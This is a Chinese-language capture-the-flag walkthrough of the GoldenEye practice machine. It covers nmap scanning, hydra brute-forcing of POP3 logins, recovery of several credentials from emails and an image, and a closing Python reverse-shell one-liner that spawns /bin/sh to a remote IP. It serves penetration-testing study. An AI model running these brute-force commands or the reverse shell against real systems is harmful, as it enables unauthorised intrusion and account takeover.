GoldenEye-黄金之眼

信息收集

探测主机IP

kali：192.168.30.142

靶机：192.168.30.143

探测端口：

nmap -p- 192.168.30.143 -Pn -sV

web渗透

发现有web端口，访问网页

发现要求/sev-home/登录，弹出一个登录框。

暂时没有发现什么信息，打开源代码，发现有两个js文件，第一个没有用，第二个有一段注释，根据经验，他像是一些引导提示

通过翻译知道，这是一段留言，提到两个人，Boris，Natalya，还有一段编码，通过解密可以得到。 InvincibleHack3r

登录成功

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port。//请记住，由于隐匿性安全性非常有效，因此我们已将 pop3 服务配置为在非常高的非默认端口上运行

这里提到了一个pop3端口，上面的端口刚好有一个pop3端口：55007

在terminal.js中提示说，可以会被爆破出密码，所以我们尝试爆破。爆破的用户名就是boris，natalya

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.30.143 -s 55007 pop3

这样我们就得到两个用户名和密码。

boris\secret1!

natalya\bird

登录到boris用户有三封信件：

分别是来自root 和natalya的邮件，她可以破解Boris的密码。

之后我们看natalya的信息

在natalya的第二件信中找到信息

用户名： xenia

密码： RCP90rulez!

域名： severnaya-station.com

URL: severnaya-station.com/gnocertdir

信息提示要将severnaya-station.com域名加入 /etc/hosts

发现了Doak一个新用户的信件，使用hydra爆破

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.30.143 -s 55007 pop3

nc登录

dr_doak

4England!

登录发现一个s3cret.txt文件

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

指向了一个/dir007key/for-007.jpg 文件

看不出什么信息，下载图片分析

eFdpbnRlcjE5OTV4IQ==

解密：

xWinter1995x!

这个是管理员账号密码

登录之后修改设置

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.30.143",4444));os.dup2(s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'